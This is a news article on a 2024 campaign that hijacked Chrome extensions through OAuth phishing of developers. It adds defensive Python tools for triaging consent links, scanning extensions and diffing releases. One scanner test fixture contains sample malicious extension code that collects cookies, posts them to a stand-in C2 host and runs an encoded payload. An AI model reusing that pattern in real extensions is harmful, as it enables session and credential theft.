Cybercriminals have unleashed a large-scale attack on popular Chrome browser extensions, potentially compromising more than 2.5 million users’ data.
Rather than relying on the popular tactic of uploading fake extensions to the Chrome Web Store, this campaign hijacks legitimate extensions and pushes malicious updates to the users who already have them installed.
As of December 30, 2024, at least 26 widely used extensions have been affected. The injected code steals user data and session cookies, and a stolen session cookie lets an attacker reuse a logged-in session without passing multi-factor authentication.
Techopedia explores the tactics behind this campaign, the browser extensions impacted, and essential tips to protect yourself and your data.
Key Takeaways
- A large-scale cyberattack is targeting known Chrome browser extensions, leaving at least 26 extensions compromised.
- The breach potentially exposes over 2.5 million users to data and credential theft.
- Black hat hackers are phishing extension developers with emails that impersonate Google Chrome Web Store Developer Support, then using the access they gain to push malicious code into legitimate extensions.
- The number of breached browser extensions could rise in the following days.
How Hackers Target Developers to Load Malicious Code in Legitimate Extensions
The California-based data protection company Cyberhaven was the first to confirm that its own extension had been compromised; reports of attacks on VPN and generative AI browser extensions followed.
By December 30, the campaign had affected at least 26 browser extensions with a combined user base of over 2.5 million. That number could continue to grow in the coming week.
The unknown cybercriminals behind the campaign are targeting the developers who publish to the Chrome Web Store, not end users directly.
Unlike other browser extension attacks, where threat actors create fake apps, this campaign injects malicious code into legitimate ones. The end goal is stealing user information at scale.
The coordinated attack on browser extensions, which began in mid-December and is still unfolding, works in an unusual way.
The attack begins with phishing emails sent to browser extension companies and their developers. These emails impersonate Google Chrome Web Store Developer Support and pressure developers by falsely claiming that their “extension is at imminent risk of removal” due to “a violation of Developer Program Policies”.
The email does not ask for a password. Its link leads to a genuine Google OAuth consent screen for an attacker-controlled application; according to Cyberhaven's account of its own compromise, approving that screen granted the application permission to publish to the company's Chrome Web Store account, without triggering any multi-factor prompt. With that access the attackers upload a malicious version of the extension, which the store then delivers to existing users as an ordinary automatic update. The injected code steals users' cookies and access tokens.
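The consent step is where the whole chain turns, so here is an added example (not code from the article, from Cyberhaven or from Google) of the check a developer or security team could run on the link in such an email before anyone clicks it. It parses a Google OAuth authorization URL and reports which scopes the app would receive, whether the client is one the team already uses, and whether the grant would persist as a refresh token. The chromewebstore scope strings are the real Chrome Web Store API scopes; the client ID, redirect host and sample links are constructed placeholders.

```python
"""Triage a Google OAuth consent link lifted from a suspected phishing email.

Added example, not code from the original article or from any vendor it names.
The attack chain described above ends with a developer approving an OAuth
consent screen, so the useful check is: what would the approval actually grant?
The chromewebstore scope strings are the real ones used by the Chrome Web Store
API; the client ID, redirect host and sample link below are constructed.
"""
from urllib.parse import parse_qs, urlparse

# Scopes that, once granted, let a third party act on the developer's store
# account. Keys are real Google scope strings; extend the table as needed.
HIGH_RISK_SCOPES = {
    "https://www.googleapis.com/auth/chromewebstore":
        "publish or update items in your Chrome Web Store account",
    "https://www.googleapis.com/auth/chromewebstore.readonly":
        "read the items in your Chrome Web Store account",
}

# Google hosts its own consent screens here; anything else is a lookalike.
GOOGLE_AUTH_HOSTS = {"accounts.google.com"}


def triage_consent_link(url: str, known_client_ids=frozenset()) -> dict:
    """Parse an OAuth authorization URL and report what approving it grants.

    known_client_ids: OAuth client IDs of apps the developer deliberately uses;
    any other client is reported as unknown.
    """
    parsed = urlparse(url)
    query = parse_qs(parsed.query)          # parse_qs URL-decodes the values
    scopes = set(" ".join(query.get("scope", [])).split())
    client_id = query.get("client_id", [""])[0]
    redirect_host = urlparse(query.get("redirect_uri", [""])[0]).hostname or ""
    offline = query.get("access_type", [""])[0] == "offline"
    risky = scopes & set(HIGH_RISK_SCOPES)

    findings = []
    if parsed.hostname not in GOOGLE_AUTH_HOSTS:
        findings.append(f"consent page is not hosted by Google: {parsed.hostname}")
    for scope in sorted(risky):
        findings.append(f"grants the app permission to {HIGH_RISK_SCOPES[scope]}")
    if client_id not in known_client_ids:
        findings.append(f"OAuth client is not one you already use: {client_id or '<missing>'}")
    if offline:
        # A refresh token is issued, so the grant outlives the current session
        # and survives password changes until it is revoked explicitly.
        findings.append("requests offline access: the grant persists until revoked")

    return {
        "consent_host": parsed.hostname,
        "client_id": client_id,
        "scopes": sorted(scopes),
        "redirect_host": redirect_host,   # where the authorization code is sent
        "offline": offline,
        "high_risk": bool(risky),
        "findings": findings,
    }


# Constructed sample: the shape of a link such a phishing email might carry.
SAMPLE_PHISH_LINK = (
    "https://accounts.google.com/o/oauth2/v2/auth"
    "?client_id=000000000000-example.apps.googleusercontent.com"
    "&redirect_uri=https%3A%2F%2Fpolicy-helper.example%2Fcallback"
    "&response_type=code"
    "&scope=https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fchromewebstore"
    "&access_type=offline&prompt=consent"
)

if __name__ == "__main__":
    for line in triage_consent_link(SAMPLE_PHISH_LINK)["findings"]:
        print("-", line)
```

The check is deliberately one-sided: a legitimate link from a vendor you already work with will still be reported if its client ID is not in `known_client_ids`, which is the point. Note that the consent host being `accounts.google.com` is not reassuring on its own; the Cyberhaven lure used Google's real consent flow, and the danger was entirely in the scope being requested.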
What Browser Extensions Have Been Hacked?
Cybersecurity researchers at Secure Annex listed the following extensions as affected; some have since been patched or removed from the Chrome Web Store:
- VPNCity
- Parrot Talks
- Uvoice
- Internxt VPN
- Bookmark Favicon Changer
- Castorus
- Wayin AI
- Search Copilot AI Assistant for Chrome
- VidHelper – Video Downloader
- AI Assistant – ChatGPT and Gemini for Chrome
- Vidnoz Flex – Video recorder & Video share
- TinaMind – The GPT-4o-powered AI Assistant!
- Bard AI chat
- Reader Mode
- Primus (prev. PADO)
- Tackker – online keylogger tool
- AI Shop Buddy
- Sort by Oldest
- Rewards Search Automator
- Earny – Up to 20% Cash Back
- ChatGPT Assistant – Smart Search
- Keyboard History Recorder
- Email Hunter
- Visual Effects for Google Meet
- Cyberhaven security extension V3
- GraphQL Network Inspector
- GPT 4 Summary with OpenAI
- YesCaptcha assistant
Together these extensions have over 2.5 million users, and the number of affected extensions could rise in the coming days.
Analysis of the malicious code shows that it contacts attacker-controlled command-and-control (C2) servers to fetch its configuration and to exfiltrate stolen data. A large number of redirects to malicious domains have also been observed.
Researchers are still working out what much of the malicious code does, because the attackers heavily obfuscated it.
Threat actors in this campaign are also stealing session cookies. A valid session cookie lets an attacker reuse a victim's logged-in session on the targeted service without going through that account's multi-factor authentication.
The code also redirects users to fake and malicious sites through search query takeovers and redirections. Taken together, these capabilities allow identity and credential theft, activity tracking, and execution of further attacker-supplied code inside the browser.
In short, the threat actors effectively control the victim's browser.
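To make the indicators above concrete, here is an added example (not code from the article, from Secure Annex or from any affected vendor) of a static triage pass over an unpacked extension. It reads the manifest for dangerous permissions and broad host access, scans the scripts for cookie access, base64 decoding, dynamic code execution and embedded blobs, and lists every hard-coded network endpoint that is not on the allowlist the analyst supplies. The two sample extensions embedded at the bottom are constructed (one mimicking a hijacked build, one clean); the permission names and chrome.* API names are real.

```python
"""Static triage of an unpacked Chrome extension for the behaviours described above.

Added example, not code from the original article, from Secure Annex or from any
affected vendor. It reads the extension's manifest and scripts and reports
dangerous permissions, code that touches cookies or decodes/executes blobs, and
network endpoints that are not on the allowlist the caller supplies. The two
sample extensions at the bottom are constructed; permission names and chrome.*
APIs are real.
"""
import json
import re
from urllib.parse import urlparse

# Permissions that make cookie theft or traffic tampering possible.
RISKY_PERMISSIONS = {
    "cookies": "read and write cookies on permitted hosts",
    "webRequest": "observe every request the browser makes",
    "webRequestBlocking": "block or rewrite requests",
    "declarativeNetRequest": "redirect or rewrite requests by rule",
    "scripting": "inject scripts into pages",
    "tabs": "see URLs and titles of open tabs",
}
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Code patterns worth a human look; none of them is proof on its own.
CODE_INDICATORS = {
    "cookie_access": re.compile(r"chrome\.cookies\.(?:get|getAll)\s*\("),
    "dynamic_code": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "base64_decode": re.compile(r"\batob\s*\("),
    "long_blob": re.compile(r"[\"'][A-Za-z0-9+/=]{120,}[\"']"),
}
URL_LITERAL = re.compile(r"https?://[A-Za-z0-9.\-]+(?:[:/][^\s\"'`]*)?")


def triage_extension(files: dict, expected_hosts=frozenset()) -> dict:
    """files maps relative path -> text content of an unpacked extension.

    expected_hosts: hostnames the extension is supposed to talk to (its own
    backend, the vendor's API); anything else is reported as undeclared.
    """
    manifest = json.loads(files["manifest.json"])
    permissions = manifest.get("permissions", []) + manifest.get("optional_permissions", [])
    # MV2 keeps host patterns inside "permissions"; MV3 moves them to host_permissions.
    host_patterns = manifest.get("host_permissions", []) + [
        p for p in permissions if "://" in p or p == "<all_urls>"
    ]

    indicators, contacted = {}, set()
    for path, text in files.items():
        if not path.endswith(".js"):
            continue
        hits = sorted(name for name, rx in CODE_INDICATORS.items() if rx.search(text))
        if hits:
            indicators[path] = hits
        for m in URL_LITERAL.finditer(text):
            host = urlparse(m.group(0)).hostname
            if host:
                contacted.add(host)

    undeclared = sorted(contacted - set(expected_hosts))
    return {
        "name": manifest.get("name"),
        "version": manifest.get("version"),
        "risky_permissions": sorted(p for p in permissions if p in RISKY_PERMISSIONS),
        "broad_hosts": sorted(p for p in host_patterns if p in BROAD_HOST_PATTERNS),
        "contacted_hosts": sorted(contacted),
        "undeclared_hosts": undeclared,
        "code_indicators": indicators,
        "needs_review": bool(indicators or undeclared),
    }


# Constructed sample 1: a hijacked build of the kind described above.
SUSPECT_EXTENSION = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Sample Helper", "version": "1.2.4",
        "permissions": ["storage", "cookies"],
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "worker.js"},
    }),
    "worker.js": (
        'const C2 = "https://cfg.updater-sync.example";\n'
        'chrome.runtime.onInstalled.addListener(async () => {\n'
        '  const cfg = await (await fetch(C2 + "/config")).json();\n'
        '  const jar = await chrome.cookies.getAll({ domain: cfg.target });\n'
        '  await fetch(C2 + "/collect", { method: "POST", body: JSON.stringify(jar) });\n'
        '});\n'
        'const stage2 = "' + "QUFB" * 40 + '";\n'
        'eval(atob(stage2));\n'
    ),
}

# Constructed sample 2: the same extension before the hijack.
CLEAN_EXTENSION = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Sample Helper", "version": "1.2.3",
        "permissions": ["storage"],
        "action": {"default_popup": "popup.html"},
    }),
    "popup.js": 'fetch("https://api.samplehelper.example/v1/ping");\n',
}

if __name__ == "__main__":
    print(json.dumps(triage_extension(SUSPECT_EXTENSION, {"api.samplehelper.example"}), indent=2))
```

Regex indicators are a starting point, not a verdict: obfuscated code can build `chrome.cookies` from string fragments, and the C2 hostname can be assembled at runtime, which is exactly why the "undeclared host" and "long blob" checks are there alongside the API-name matches.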
Sophisticated Browser Hijack
To date, the actor behind this wave of attacks on browser extension developers has not been identified.
As the techniques used by attackers continue to develop, other threat actors may join in, seizing the opportunity.
While many affected developers reported email phishing as the attack vector, it is possible that other infiltration methods have been deployed.
Browser extension hijacking is not uncommon, but pushing malicious code to millions of users through a legitimate developer's own store account is not something seen every day.
Compromised versions are being removed from the Chrome Web Store so that users cannot install extensions that are operating as malware, while developers work on and deploy patched versions.
Because of the scale of the attack, security teams and companies are still playing catch-up. An automated attack vector may explain why the campaign is scaling so fast.
The threat actors evidently hold a long list of email addresses belonging to browser extension developers, most likely fed into automated phishing tooling that speeds up distribution of the lure.
Developer contact emails are publicly listed on the Chrome Web Store, where they are meant for bug reports. It is unclear whether the threat actor also obtained developer information from another breach or leak.
Tirath Ramdas, AI software developer and founder of Chamomile.ai, spoke to Techopedia about browser extension security.
“There is a perception that browser extensions are plugins and, as such, would not be capable of much harm.
“But in reality, browser extensions and web service workers sit in a highly privileged position, potentially intercepting the visible and non-visible content related to every web page viewed by the user.”
Ramdas said that consumers have become more aware of the risks of downloading and running software from the Internet, and that browsers and operating systems like Windows and macOS do a good job of protecting users from malware.
“But this awareness and protection does not extend to browser extensions,” Ramdas said.
The Bottom Line: How To Keep Safe
Because a large number of websites, IPs and domains have been linked to this campaign, and several distinct techniques have been identified, there is no single patch or setting that users or developers can deploy as a silver bullet.
If you have installed one of the affected extensions, uninstall it (or update to a version the developer has confirmed as clean). Because the stolen items are session cookies, also sign out of the sites you used while the extension was installed, or clear your browser's cookies and cache, so that any copied sessions stop working.
Review the permissions of your remaining extensions as well. Changing your passwords and enabling multi-factor authentication may be a burden, but it is a necessary step for anyone affected; note that MFA alone does not protect a session whose cookie has already been stolen, which is why invalidating sessions matters.
Developers and browser extension companies have a harder road ahead. They must audit the versions of their extensions currently published, confirming that what the store serves matches what they built, and review which third-party applications have been granted access to their developer accounts.
They must also watch for suspicious activity and warn fellow developers about the phishing lure.
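One way to do that integrity audit, as an added example that is not code from the article or from any vendor it names: unpack both the release the developer built and the package the store is currently serving, then compare them file by file and check the manifest fields that matter. The two sample file trees embedded below are constructed; `load_tree` is the hypothetical helper for reading real directories, and the manifest keys are the real ones.

```python
"""Compare the extension version a store is serving with the developer's own build.

Added example, not code from the original article or from any vendor it names.
A developer unpacks two trees, their own release build and the package currently
served to users, and this reports every file that was added, removed or altered,
plus changes to the manifest fields that matter for security. The two sample
trees at the bottom are constructed; the manifest keys are real.
"""
import hashlib
import json
from pathlib import Path

# Manifest fields whose change means "a human must look at this release".
SENSITIVE_MANIFEST_KEYS = (
    "version", "permissions", "optional_permissions", "host_permissions",
    "background", "content_scripts", "externally_connectable", "update_url",
)


def load_tree(root: str) -> dict:
    """Read an unpacked extension directory into {relative path: bytes}."""
    base = Path(root)
    return {str(p.relative_to(base)).replace("\\", "/"): p.read_bytes()
            for p in base.rglob("*") if p.is_file()}


def _digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def compare_release(built: dict, published: dict) -> dict:
    """Both arguments map relative path -> file bytes."""
    b_hash = {n: _digest(d) for n, d in built.items()}
    p_hash = {n: _digest(d) for n, d in published.items()}

    added = sorted(set(p_hash) - set(b_hash))
    removed = sorted(set(b_hash) - set(p_hash))
    changed = sorted(n for n in set(b_hash) & set(p_hash) if b_hash[n] != p_hash[n])

    # Even a one-line manifest change can add "cookies" or "<all_urls>", so
    # report the sensitive keys separately rather than as a raw file diff.
    manifest_diff = {}
    if "manifest.json" in built and "manifest.json" in published:
        bm = json.loads(built["manifest.json"])
        pm = json.loads(published["manifest.json"])
        for key in SENSITIVE_MANIFEST_KEYS:
            if bm.get(key) != pm.get(key):
                manifest_diff[key] = {"built": bm.get(key), "published": pm.get(key)}

    return {
        "added": added,
        "removed": removed,
        "changed": changed,
        "manifest_diff": manifest_diff,
        "clean": not (added or removed or changed),
    }


# Constructed sample: what the developer actually shipped ...
BUILT = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Sample Helper", "version": "1.2.3",
        "permissions": ["storage"],
        "background": {"service_worker": "background.js"},
    }).encode(),
    "background.js": b"chrome.runtime.onInstalled.addListener(() => {});\n",
    "popup.html": b"<html><body>Sample Helper</body></html>\n",
}

# ... and what the store serves after an attacker used the developer account.
PUBLISHED = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Sample Helper", "version": "1.2.4",
        "permissions": ["storage", "cookies"],
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "worker.js"},
    }).encode(),
    "background.js": BUILT["background.js"],       # untouched
    "popup.html": BUILT["popup.html"],             # untouched
    "worker.js": b"importScripts('background.js'); /* exfiltration stage */\n",
    "content.js": b"/* injected into every page */\n",
}

if __name__ == "__main__":
    print(json.dumps(compare_release(BUILT, PUBLISHED), indent=2))
```

Run this against every published item on a schedule, not just once: a malicious update can be pushed at any time after the account is compromised, and the store-side version number is the only signal users see. `compare_release(load_tree("dist/"), load_tree("served/"))` is the intended real-world call.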
Browsers are considered a treasure trove for cybercriminals, as they store a wide range of personal information.
Remember to install only extensions you are familiar with. Be wary of extensions with very few users and read the reviews before adding one to your browser; as this campaign shows, a large user base is no guarantee either, so also check the permissions an extension requests and remove any you no longer use.
FAQs
What is the scale of the Chrome browser extension cyberattack?
How are hackers compromising Chrome extensions?
What should I do if I’ve installed a compromised extension?
What data can hackers access through compromised extensions?
How can users avoid downloading malicious Chrome extensions?
How can developers protect their browser extensions?
References
- When Good Extensions Go Bad: Takeaways from the Campaign Targeting Browser Extensions (Hacker News)
- Secure Annex – Enterprise Browser Extension Security & Management Platform (Secure Annex)
- Tirath Ramdas – Chamomile.ai (LinkedIn)
- Chamomile.ai (Chamomile)